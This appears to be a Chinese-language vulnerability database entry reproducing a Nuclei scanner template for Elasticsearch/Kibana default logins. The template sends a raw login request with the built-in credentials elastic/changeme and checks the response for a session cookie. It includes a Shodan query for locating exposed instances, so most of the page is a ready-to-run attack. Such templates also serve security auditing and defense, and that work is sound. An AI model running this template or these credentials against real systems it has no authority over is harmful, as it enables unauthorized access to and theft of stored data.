elasticsearch-default-login: ElasticSearch - Default Login

日期: 2025-08-01 | 影响软件: ElasticSearch | POC: 已公开

漏洞描述

Elasticsearch default credentials were discovered.

PoC代码[已公开]

id: elasticsearch-default-login

info:
  name: ElasticSearch - Default Login
  author: Mohammad Reza Omrani | @omranisecurity
  severity: high
  description: |
    Elasticsearch default credentials were discovered.
  reference:
    - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
    - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html
  classification:
    cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: elastic
    product: elasticsearch
    shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
  tags: default-login,elasticsearch,vuln

http:
  - raw:
      - |
        POST /internal/security/login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5
        Referer: {{RootURL}}/login
        Content-Type: application/json
        kbn-version: 8.8.2
        x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D
        Origin: {{RootURL}}

        {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }}

    payloads:
      username:
        - elastic
      password:
        - changeme
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie: sid='
          - 'kbn-license-sig:'
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ce0a7ef6aa24cd181e25afcdc55bc8eef119d0d1f7bb446c0db55442ef3d7a99022100c3091175dc28697ba16a46782a27045d0ccc966ecf02ed9ac7a25add531d9696:922c64590222798bb761d5b6d8e72950

相关漏洞推荐